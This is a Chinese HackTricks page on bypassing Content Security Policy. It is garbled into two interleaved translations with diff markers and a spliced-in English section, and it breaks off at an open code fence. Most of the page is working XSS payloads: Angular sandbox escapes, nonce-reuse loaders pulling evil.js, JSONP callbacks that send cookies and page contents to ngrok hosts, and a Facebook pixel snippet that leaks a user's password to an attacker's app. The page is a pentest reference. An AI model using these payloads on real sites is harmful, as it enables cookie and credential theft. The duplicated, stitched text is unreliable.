学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy)立即与顶尖黑客合作!
**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作
## 什么是CSP
## 什么是 CSP
内容安全策略CSP被认为是一种浏览器技术主要旨在**防范跨站脚本XSS等攻击**。它通过定义和详细说明浏览器可以安全加载资源的路径和来源来发挥作用。这些资源包括各种元素如图像、框架和JavaScript。例如策略可能允许从同一域self加载和执行资源包括内联资源和通过`eval`、`setTimeout`或`setInterval`等函数执行字符串代码。
内容安全策略 (CSP) 被认为是一种浏览器技术,主要旨在 **防御诸如跨站脚本 (XSS) 的攻击**。它通过定义和详细说明资源可以安全加载的路径和来源来运作。这些资源包括图像、框架和 JavaScript 等多种元素。例如,策略可能允许从同一域 (self) 加载和执行资源,包括内联资源以及通过 `eval`、`setTimeout` 或 `setInterval` 等函数执行字符串代码。
CSP的实施通过**响应头**或将**元素嵌入HTML页面**来进行。根据此策略,浏览器会主动执行这些规定,并立即阻止检测到的任何违规行为。
CSP 的实施通过 **响应头** 或通过将 **meta 元素嵌入 HTML 页面** 来进行。遵循此政策后,浏览器会主动执行这些规定,并立即阻止任何检测到的违规行为。
* 通过响应头实施:
```
@ -45,14 +46,14 @@ Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com;
```
### Headers
CSP可以使用以下标头来强制执行或监控:
CSP 可以通过以下头部进行强制执行或监控:
* `Content-Security-Policy`:强制执行CSP浏览器会阻止任何违规行为。
* `Content-Security-Policy-Report-Only`:用于监控;报告违规行为但不阻止它们。适用于在预生产环境中进行测试。
* `Content-Security-Policy`: 强制执行 CSP浏览器会阻止任何违规行为。
* `Content-Security-Policy-Report-Only`: 用于监控;报告违规行为而不阻止它们。非常适合在预生产环境中进行测试。
### 定义资源
### Defining Resources
CSP限制了加载活动和被动内容的来源控制诸如内联JavaScript执行和使用`eval()`等方面。一个示例策略是:
CSP 限制加载主动和被动内容的来源,控制诸如内联 JavaScript 执行和使用 `eval()` 等方面。一个示例策略是:
```bash
default-src 'none';
img-src 'self';
@ -66,42 +67,42 @@ object-src 'none';
```
### 指令
* **script-src**:允许特定 JavaScript 源,包括 URL、内联脚本以及由事件处理程序或 XSLT 样式表触发的脚本。
* **default-src**:设置在特定获取指令缺失时获取资源的默认策略。
* **child-src**:指定 Web Workers 和嵌入式框架内容的允许资源。
* **connect-src**:限制可以使用 fetch、WebSocket、XMLHttpRequest 等接口加载的 URL。
* **frame-src**:限制框架的 URL。
* **frame-ancestors**:指定哪些源可以嵌入当前页面,适用于 `<frame>`、`<iframe>`、`<object>`、`<embed>` `<applet>` 等元素。
* **img-src**:定义图像的允许源。
* **font-src**:指定使用 `@font-face` 加载的字体的有效源。
* **manifest-src**:定义应用清单文件的允许源。
* **media-src**:定义加载媒体对象的允许源。
* **object-src**:定义 `<object>`、`<embed>` 和 `<applet>` 元素的允许源。
* **base-uri**:指定使用 `<base>` 元素加载的允许 URL。
* **form-action**列出表单提交的有效端点。
* **plugin-types**:限制页面可以调用的 MIME 类型。
* **upgrade-insecure-requests**:指示浏览器将 HTTP URL 重写为 HTTPS。
* **sandbox**:应用类似于 `<iframe>` 的 sandbox 属性的限制。
* **report-to**:指定违反策略时将发送报告的组。
* **worker-src**:指定 Worker、SharedWorker 或 ServiceWorker 脚本的有效源。
* **prefetch-src**:指定将被获取或预获取的资源的有效源。
* **navigate-to**:限制文档可以通过任何方式导航到的 URLa、form、window.location、window.open 等)。
* **script-src**: 允许特定来源的JavaScript包括URL、内联脚本和由事件处理程序或XSLT样式表触发的脚本。
* **default-src**: 设置在缺少特定获取指令时获取资源的默认策略。
* **child-src**: 指定允许的Web工作者和嵌入框架内容的资源。
* **connect-src**: 限制可以通过fetch、WebSocket、XMLHttpRequest等接口加载的URL。
* **frame-src**: 限制框架的URL。
* **frame-ancestors**: 指定可以嵌入当前页面的来源,适用于`<frame>`、`<iframe>`、`<object>`、`<embed>`和`<applet>`等元素。
* **img-src**: 定义允许的图像来源。
* **font-src**: 指定通过`@font-face`加载的字体的有效来源。
* **manifest-src**: 定义应用程序清单文件的允许来源。
* **media-src**: 定义加载媒体对象的允许来源。
* **object-src**: 定义`<object>`、`<embed>`和`<applet>`元素的允许来源。
* **base-uri**: 指定使用`<base>`元素加载的允许URL。
* **form-action**: 列出表单提交的有效端点。
* **plugin-types**: 限制页面可以调用的mime类型。
* **upgrade-insecure-requests**: 指示浏览器将HTTP URL重写为HTTPS。
* **sandbox**: 应用类似于`<iframe>`的sandbox属性的限制。
* **report-to**: 指定如果违反政策将发送报告的组。
* **worker-src**: 指定Worker、SharedWorker或ServiceWorker脚本的有效来源。
* **prefetch-src**: 指定将被获取或预获取的资源的有效来源。
* **navigate-to**: 限制文档可以通过任何方式导航的URLa、form、window.location、window.open等)。
### 源
###
* `*`:允许所有 URL除了具有 `data:`、`blob:`、`filesystem:` 方案的 URL。
* `'self'`:允许从相同域加载。
* `'data'`:允许通过 data 方案加载资源例如Base64 编码的图像)。
* `'none'`:阻止从任何源加载。
* `'unsafe-eval'`:允许使用 `eval()` 和类似方法,出于安全原因不建议使用。
* `'unsafe-hashes'`:启用特定内联事件处理程序。
* `'unsafe-inline'`:允许使用内联资源,如内联 `<script>``<style>`,出于安全原因不建议使用。
* `'nonce'`:使用加密 nonce一次性数字特定内联脚本的白名单。
* 如果您有 JS 限制执行,可以通过 `doc.defaultView.top.document.querySelector("[nonce]")` 在页面内获取已使用的 nonce然后重用它来加载恶意脚本如果使用了 strict-dynamic则任何允许的源都可以加载新源因此不需要此操作例如
* `*`: 允许所有URL除了那些具有`data:`、`blob:`、`filesystem:`方案的URL。
* `'self'`: 允许从同一域加载。
* `'data'`: 允许通过数据方案加载资源例如Base64编码的图像)。
* `'none'`: 阻止从任何来源加载。
* `'unsafe-eval'`: 允许使用`eval()`和类似方法,出于安全原因不推荐使用。
* `'unsafe-hashes'`: 启用特定的内联事件处理程序。
* `'unsafe-inline'`: 允许使用内联资源,如内联`<script>`或`<style>`,出于安全原因不推荐使用。
* `'nonce'`: 使用加密nonce一次性使用的数字特定内联脚本的白名单。
* 如果您有JS限制执行可以通过`doc.defaultView.top.document.querySelector("[nonce]")`在页面内获取使用的nonce然后重用它加载恶意脚本如果使用了strict-dynamic任何允许的来源都可以加载新来源因此这不是必需的如在
<details>
<summary>重用 nonce 加载脚本</summary>
<summary>重用nonce加载脚本</summary>
```html
<!-- From https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/ -->
<img src=x ng-on-error='
@ -113,16 +114,16 @@ b.nonce=a.nonce; doc.body.appendChild(b)'>
```
</details>
* `'sha256-<hash>'`: 使用特定的 sha256 哈希值来允许脚本加载
* `'strict-dynamic'`: 如果已经被 nonce 或哈希值列入白名单,允许从任何来源加载脚本。
* `'host'`: 指定特定主机,如 `example.com`
* `https:`: 限制只能加载使用 HTTPS 的 URL
* `blob:`: 允许从 Blob URL例如通过 JavaScript 创建的 Blob URL加载资源
* `'sha256-<hash>'`: 白名单特定 sha256 哈希的脚本
* `'strict-dynamic'`: 如果通过 nonce 或哈希被列入白名单,则允许从任何来源加载脚本。
* `'host'`: 指定特定主机,`example.com`
* `https:`: 限制 URL 仅使用 HTTPS
* `blob:`: 允许从 Blob URL 加载资源(例如,通过 JavaScript 创建的 Blob URL
* `filesystem:`: 允许从文件系统加载资源。
* `'report-sample'`: 在违规报告中包含违规代码的示例(用于调试)。
* `'strict-origin'`: 类似于 'self',但确保源的协议安全级别与文档匹配(只有安全源才能从安全源加载资源)。
* `'strict-origin-when-cross-origin'`: 在进行同源请求时发送完整的 URL但在跨源请求时只发送源。
* `'unsafe-allow-redirects'`: 允许加载将立即重定向到另一个资源的资源。不建议使用,因为会降低安全性。
* `'report-sample'`: 在违规报告中包含违规代码的示例(对调试有用)。
* `'strict-origin'`: 类似于 'self',但确保源的协议安全级别与文档匹配(只有安全源可以从安全源加载资源)。
* `'strict-origin-when-cross-origin'`: 在进行同源请求时发送完整 URL但在跨源请求时仅发送源。
* `'unsafe-allow-redirects'`: 允许加载会立即重定向到另一个资源的资源。不推荐使用,因为这会削弱安全性。
## 不安全的 CSP 规则
@ -130,7 +131,7 @@ b.nonce=a.nonce; doc.body.appendChild(b)'>
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
```
工作负载:`"/><script>alert(1);</script>`
工作有效载荷: `"/><script>alert(1);</script>`
#### self + 'unsafe-inline' 通过 Iframes
@ -141,7 +142,7 @@ Content-Security-Policy: script-src https://google.com 'unsafe-inline';
### 'unsafe-eval'
{% hint style="danger" %}
个方法不起作用,更多信息请[**查看此处**](https://github.com/HackTricks-wiki/hacktricks/issues/653)。
这不起作用,更多信息请 [**查看此处**](https://github.com/HackTricks-wiki/hacktricks/issues/653)。
{% endhint %}
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-eval';
@ -152,21 +153,21 @@ Content-Security-Policy: script-src https://google.com 'unsafe-eval';
```
### strict-dynamic
如果你可以以某种方式使一个**允许的 JS 代码创建一个新的脚本标签**在 DOM 中,因为一个允许的脚本正在创建它,**新的脚本标签将被允许执行**。
如果你能以某种方式使一个**允许的 JS 代码创建一个新的 script 标签**在 DOM 中,并且是由允许的脚本创建的,那么**新的 script 标签将被允许执行**。
### 通配符 (\*)
### Wildcard (\*)
```yaml
Content-Security-Policy: script-src 'self' https://google.com https: data *;
```
有效载荷:
工作有效载荷:
```markup
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### 缺 object-src 和 default-src
### 缺 object-src 和 default-src
{% hint style="danger" %}
**看起来这个方法不再有效**
**看起来这不再有效**
{% endhint %}
```yaml
Content-Security-Policy: script-src 'self' ;
@ -181,31 +182,31 @@ Content-Security-Policy: script-src 'self' ;
```yaml
Content-Security-Policy: script-src 'self'; object-src 'none' ;
```
如果您可以上传一个JS文件您可以绕过这个CSP
如果您可以上传一个 JS 文件,您可以绕过这个 CSP
有效载荷:
工作有效载荷:
```markup
"/>'><script src="/uploads/picture.png.js"></script>
```
然而,服务器很可能正在**验证上传的文件**,并且只允许您**上传特定类型的文件**。
然而,服务器**正在验证上传的文件**,并且只允许您**上传特定类型的文件**。
此外,即使您可以使用服务器接受的扩展名_script.png_在文件中上传**JS代码**这也是不够的因为一些服务器如Apache服务器会**根据扩展名选择文件的MIME类型**而像Chrome这样的浏览器会**拒绝执行应该是图像的内容中的Javascript**代码。"幸运的是"存在一些错误。例如从一个CTF中我学到**Apache不认识**_**.wave**_扩展名因此不会使用类似audio/\*的**MIME类型**提供它。
此外,即使您能够使用服务器接受的扩展名_script.png_在文件中上传**JS代码**这也不够因为一些服务器如apache服务器**根据扩展名选择文件的MIME类型**而像Chrome这样的浏览器将**拒绝执行应该是图像的内容中的Javascript**代码。“希望”有错误。例如从一个CTF中我了解到**Apache不知道**_**.wave**_扩展名因此它不会以**MIME类型如audio/***提供它。
从这里开始,如果您发现了一个XSS漏洞和一个文件上传功能并且您设法找到了一个**被错误解释的扩展名**,您可以尝试上传一个带有该扩展名和脚本内容的文件。或者,如果服务器正在检查上传文件的正确格式,可以创建一个多语言混合体([这里有一些多语言混合体示例](https://github.com/Polydet/polyglot-database))。
从这里开始,如果您发现XSS和文件上传并且您设法找到一个**被误解的扩展名**,您可以尝试上传一个具有该扩展名和脚本内容的文件。或者,如果服务器正在检查上传文件的正确格式,可以创建一个多用途文件([这里有一些多用途文件示例](https://github.com/Polydet/polyglot-database))。
### 表单操作
### Form-action
如果无法注入JS您仍然可以尝试窃取例如凭据,**注入表单操作**(并且可能期望密码管理器自动填充密码)。您可以在[**此报告中找到一个示例**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。另外,请注意`default-src`不包括表单操作。
如果无法注入JS您仍然可以尝试通过**注入表单操作**来提取例如凭据(并可能期望密码管理器自动填写密码)。您可以在[**此报告中找到一个示例**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。另外,请注意`default-src`不涵盖表单操作。
### 第三方端点 + ('unsafe-eval')
{% hint style="warning" %}
对于以下一些有效载荷,**甚至不需要`unsafe-eval`**。
对于以下某些有效负载**`unsafe-eval`甚至不需要**。
{% endhint %}
```yaml
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
```
加载一个有漏洞的 Angular 版本并执行任意的 JS
加载一个易受攻击的 Angular 版本并执行任意 JS
```xml
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
@ -226,10 +227,10 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>
```
#### 使用 Angular + 一个返回 `window` 对象的函数库的有效载荷 ([查看这篇文章](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
#### 使用 Angular + 一个返回 `window` 对象的函数库的有效载荷 ([查看此帖子](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/))
{% hint style="info" %}
这篇文章展示了你可以从 `cdn.cloudflare.com`(或任何其他允许的 JS 库仓库)**加载**所有**库**,执行每个库中添加的所有函数,并检查**哪些函数从哪些库返回了 `window` 对象**
该帖子显示您可以 **加载** 来自 `cdn.cloudflare.com`(或任何其他允许的 JS 库库)的所有 **库**,执行每个库中添加的所有函数,并检查 **哪些库中的哪些函数返回 `window` 对象**
{% endhint %}
```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
@ -254,15 +255,15 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
{{[].erase.call().alert('xss')}}
</div>
```
## 从类名中的 Angular XSS
Angular XSS来自类名
```html
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
```
#### 滥用谷歌 reCAPTCHA JS 代码
#### 滥用谷歌 recaptcha JS 代码
根据[**这篇 CTF 解密**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?\_x\_tr\_sl=es&\_x\_tr\_tl=en&\_x\_tr\_hl=es&\_x\_tr\_pto=wapp#noteninja-3-solves),您可以滥用 [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) 在 CSP 中执行任意 JS 代码,绕过 CSP
根据 [**这篇 CTF 文章**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?\_x\_tr\_sl=es&\_x\_tr\_tl=en&\_x\_tr\_hl=es&\_x\_tr\_pto=wapp#noteninja-3-solves),你可以在 CSP 内部滥用 [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) 来执行任意 JS 代码,从而绕过 CSP
```html
<div
ng-controller="CarouselController as c"
@ -273,7 +274,7 @@ ng-init="c.init()"
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
```
更多[**此篇文章中的有效载荷**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/)
更多 [**来自此文档的有效载荷**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
```html
<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>
@ -288,21 +289,21 @@ b=doc.createElement("script");
b.src="//example.com/evil.js";
b.nonce=a.nonce; doc.body.appendChild(b)'>
```
#### 滥用 www.google.com 进行开放式重定向
#### 利用 www.google.com 进行开放重定向
以下URL将重定向到 example.com来自[这里](https://www.landh.tech/blog/20240304-google-hack-50000/):
以下 URL 重定向到 example.com来自 [这里](https://www.landh.tech/blog/20240304-google-hack-50000/)
```
https://www.google.com/amp/s/example.com/
```
### 利用 \*.google.com/script.google.com
用 \*.google.com/script.google.com
可以滥用 Google Apps Script 在 script.google.com 中接收页面内的信息。就像在[这份报告](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/)所做的那样。
可以滥用 Google Apps Script 在 script.google.com 内的页面接收信息。就像在[这份报告中](https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/)所做的那样。
### 第三方端点 + JSONP
```http
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```
在这种情况下,`script-src` 设置为 `self` 和一个特定的已列入白名单的域名,可以通过使用 JSONP 来绕过。JSONP 端点允许使用不安全的回调方法,这使得攻击者可以执行 XSS有效载荷如下
像这样的场景,其中 `script-src` 设置为 `self` 和一个特定的白名单域,可以通过 JSONP 绕过。JSONP 端点允许不安全的回调方法,这使得攻击者能够执行 XSS工作有效载荷
```markup
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
@ -312,90 +313,72 @@ Content-Security-Policy: script-src 'self' https://www.google.com https://www.yo
https://www.youtube.com/oembed?callback=alert;
<script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
```
[**JSONBee**](https://github.com/zigoo0/JSONBee) **包含了用于绕过不同网站的CSP的JSONP端点。**
[**JSONBee**](https://github.com/zigoo0/JSONBee) **包含可用于不同网站的CSP绕过的现成JSONP端点。**
如果**受信任的端点包含一个开放重定向**,将会出现相同的漏洞,因为如果初始端点受信任,则重定向也会受信任
如果**受信任的端点包含开放重定向**,则会发生相同的漏洞,因为如果初始端点是受信任的,则重定向也是受信任的
### 第三方滥用
如[以下帖子](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses)中所述许多第三方域可能会被允许在CSP的某个地方使用可以被滥用来窃取数据或执行JavaScript代码。其中一些第三方是:
如[以下帖子](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses)所述有许多第三方域名可能在CSP中被允许可以被滥用以提取数据或执行JavaScript代码。这些第三方中的一些是:
| 实体 | 允许的域名 | 能力 |
| ----------------- | -------------------------------------------- | ------------ |
| Facebook | www.facebook.com, \*.facebook.com | 窃取 |
| Hotjar | \*.hotjar.com, ask.hotjar.io | 窃取 |
| Jsdelivr | \*.jsdelivr.com, cdn.jsdelivr.net | 执行 |
| Amazon CloudFront | \*.cloudfront.net | 窃取, 执行 |
| Amazon AWS | \*.amazonaws.com | 窃取, 执行 |
| Azure Websites | \*.azurewebsites.net, \*.azurestaticapps.net | 窃取, 执行 |
| Salesforce Heroku | \*.herokuapp.com | 窃取, 执行 |
| Google Firebase | \*.firebaseapp.com | 窃取, 执行 |
| 实体 | 允许的域名 | 能力 |
| ----------------- | ------------------------------------------ | ------------ |
| Facebook | www.facebook.com, \*.facebook.com | Exfil |
| Hotjar | \*.hotjar.com, ask.hotjar.io | Exfil |
| Jsdelivr | \*.jsdelivr.com, cdn.jsdelivr.net | Exec |
| Amazon CloudFront | \*.cloudfront.net | Exfil, Exec |
| Amazon AWS | \*.amazonaws.com | Exfil, Exec |
| Azure Websites | \*.azurewebsites.net, \*.azurestaticapps.net | Exfil, Exec |
| Salesforce Heroku | \*.herokuapp.com | Exfil, Exec |
| Google Firebase | \*.firebaseapp.com | Exfil, Exec |
如果在目标的CSP中发现任何允许的域名那么很有可能您可以通过在第三方服务上注册来绕过CSP从而将数据窃取到该服务或执行代码。
如果您在目标的CSP中发现任何允许的域名您可能能够通过在第三方服务上注册来绕过CSP并将数据提取到该服务或执行代码。
例如如果您发现以下CSP
```
Content-Security-Policy: default-src 'self www.facebook.com;
```
### Content Security Policy (CSP) Bypass
#### Introduction
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, such as Cross Site Scripting (XSS) and data injection attacks. However, misconfigurations or bypasses in CSP can lead to security vulnerabilities.
#### Bypassing CSP using `unsafe-inline`
One common way to bypass CSP is by using the `unsafe-inline` keyword in the CSP header. This allows the execution of inline scripts and styles, which can be exploited by an attacker to execute malicious code.
#### Bypassing CSP using data: URI
Another way to bypass CSP is by using `data:` URIs to embed external resources inline. By encoding the external resource into a Base64 string, an attacker can include the resource within the HTML document, bypassing CSP restrictions.
#### Bypassing CSP using meta tag
CSP can also be bypassed by injecting a `<meta>` tag with an `http-equiv` attribute set to `Content-Security-Policy`. This can be used to override the CSP header set by the server, allowing an attacker to define their own policy.
#### Conclusion
It is important to properly configure and test Content Security Policy to prevent security vulnerabilities. Regular security assessments and penetration testing can help identify and mitigate CSP bypasses effectively.
```
Content-Security-Policy: connect-src www.facebook.com;
```
你应该能够像以往使用[Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/)那样,窃取数据。在这种情况下,您可以按照以下一般步骤操作
您应该能够提取数据,类似于使用 [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/) 一直以来的做法。在这种情况下,您遵循以下一般步骤:
1. 在此处创建一个Facebook开发者帐户。
2. 创建一个新的“Facebook登录”应用程序,并选择“网站”。
3. 转到“设置 -> 基本信息”并获取您的“应用ID”。
4. 在要从中窃取数据的目标网站上您可以通过直接使用Facebook SDK小工具“fbq”通过“customEvent”和数据有效负载来窃取数据。
5. 转到您的应用程序“事件管理器”,选择您创建的应用程序(请注意,事件管理器可以在类似于此URL的位置找到https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events
1. 在此处创建一个 Facebook 开发者帐户。
2. 创建一个新的“Facebook 登录”应用并选择“网站”。
3. 转到“设置 -> 基本”,获取您的“应用 ID”。
4. 在您想要提取数据的目标网站中您可以通过“customEvent”和数据负载直接使用 Facebook SDK 小工具“fbq”来提取数据。
5. 转到您的应用“事件管理器”,选择您创建的应用(请注意,事件管理器可以在类似于此的 URL 中找到https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events
6. 选择“测试事件”选项卡,以查看“您的”网站发送的事件。
然后,在受害者您执行以下代码来初始化Facebook跟踪像素指向攻击者的Facebook开发者帐户应用程序ID并发出类似于以下内容的自定义事件:
然后,在受害者一侧,您执行以下代码以初始化 Facebook 跟踪像素,指向攻击者的 Facebook 开发者帐户应用 ID并发出如下自定义事件
```JavaScript
fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account
fbq('trackCustom', 'My-Custom-Event',{
data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"
});
```
### 通过RPO相对路径覆盖进行绕过 <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
关于前表中指定的其他七个第三方域名,还有许多其他方法可以滥用它们。有关其他第三方滥用的更多解释,请参阅之前的 [blog post](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses)。
除了前面提到的重定向绕过路径限制之外还有一种称为相对路径覆盖RPO的技术可用于某些服务器。
### 通过 RPO相对路径覆盖绕过 <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
例如,如果 CSP 允许路径 `https://example.com/scripts/react/`,则可以按以下方式绕过:
除了前面提到的重定向以绕过路径限制还有一种称为相对路径覆盖RPO的技术可以在某些服务器上使用。
例如,如果 CSP 允许路径 `https://example.com/scripts/react/`,则可以通过以下方式绕过:
```html
<script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
```
浏览器最终将加载 `https://example.com/scripts/angular/angular.js`
这是因为对于浏览器来说,您正在加载位于 `https://example.com/scripts/react/`名为 `..%2fangular%2fangular.js` 的文件,这与 CSP 兼容
之所以有效,是因为对于浏览器来说,您正在加载一个名为 `..%2fangular%2fangular.js` 的文件,该文件位于 `https://example.com/scripts/react/`,这符合 CSP
因此,它们将对其进行解码,有效请求 `https://example.com/scripts/react/../angular/angular.js`,这等同于 `https://example.com/scripts/angular/angular.js`
∑,它们将解码它,有效地请求 `https://example.com/scripts/react/../angular/angular.js`,这等同于 `https://example.com/scripts/angular/angular.js`
通过**利用浏览器和服务器在 URL 解释上的不一致性,可以绕过路径规则**
通过 **利用浏览器和服务器之间 URL 解释的不一致性,可以绕过路径规则**
解决方案是在服务器端不将 `%2f` 视为 `/`,确保浏览器和服务器之间的一致解释以避免此问题。
解决方案是确保服务器端不将 `%2f` 视为 `/`,以确保浏览器和服务器之间的一致解释,从而避免此问题。
在线示例:[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
在线示例:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
### Iframes JS 执行
@ -405,35 +388,33 @@ data: "Leaked user password: '"+document.getElementById('user-password').innerTe
### 缺少 **base-uri**
如果缺少 **base-uri** 指令,您可以用它执行 [**悬挂标记注入**](../dangling-markup-html-scriptless-injection/)。
如果缺少 **base-uri** 指令,您可以用它执行 [**悬挂标记注入**](../dangling-markup-html-scriptless-injection/)。
此外,如果页面使用相对路径加载脚本(如 `<script src="/js/app.js">`)并使用 **Nonce**,您可以滥用 **base** **tag** 使其从 **您自己的服务器加载** 脚本以实现 XSS。\
如果易受攻击的页面使用 **httpS** 加载,请在 base 中使用 httpS url
此外,如果 **页面使用相对路径加载脚本**(如 `<script src="/js/app.js">`)并使用 **Nonce**,您可以利用 **base** **标签** 使其 **从您自己的服务器加载** 脚本,从而实现 **XSS**。\
如果易受攻击的页面是通过 **httpS** 加载的,请在 base 中使用 httpS URL
```html
<base href="https://www.attacker.com/">
```
### AngularJS 事件
一种名为内容安全策略CSP的特定策略可能会限制JavaScript事件。然而AngularJS引入了自定义事件作为一种替代方案。在事件中AngularJS提供了一个名为`$event`的唯一对象,引用了原生浏览器事件对象。这个`$event`对象可以被利用来规避CSP。值得注意的是在Chrome中`$event/event`对象具有一个`path`属性,其中包含一个对象数组,涉及事件执行链,`window`对象始终位于最后。这种结构对于沙箱逃逸策略至关重要。
一种特定的策略称为内容安全策略CSP可能会限制 JavaScript 事件。然而AngularJS 引入了自定义事件作为替代。在事件中AngularJS 提供了一个独特的对象 `$event`,引用原生浏览器事件对象。这个 `$event` 对象可以被利用来规避 CSP。值得注意的是在 Chrome 中,`$event/event` 对象具有一个 `path` 属性,包含一个对象数组,涉及事件的执行链,`window` 对象始终位于末尾。这个结构对于沙箱逃逸策略至关重要。
通过将这个数组指向`orderBy`过滤器,可以对其进行迭代,利用终端元素(`window`对象)来触发类似`alert()`的全局函数。下面演示的代码片段阐明了这个过程:
通过将这个数组传递给 `orderBy` 过滤器,可以对其进行迭代,利用终端元素(`window` 对象)触发像 `alert()` 这样的全局函数。下面的代码片段阐明了这个过程:
```xml
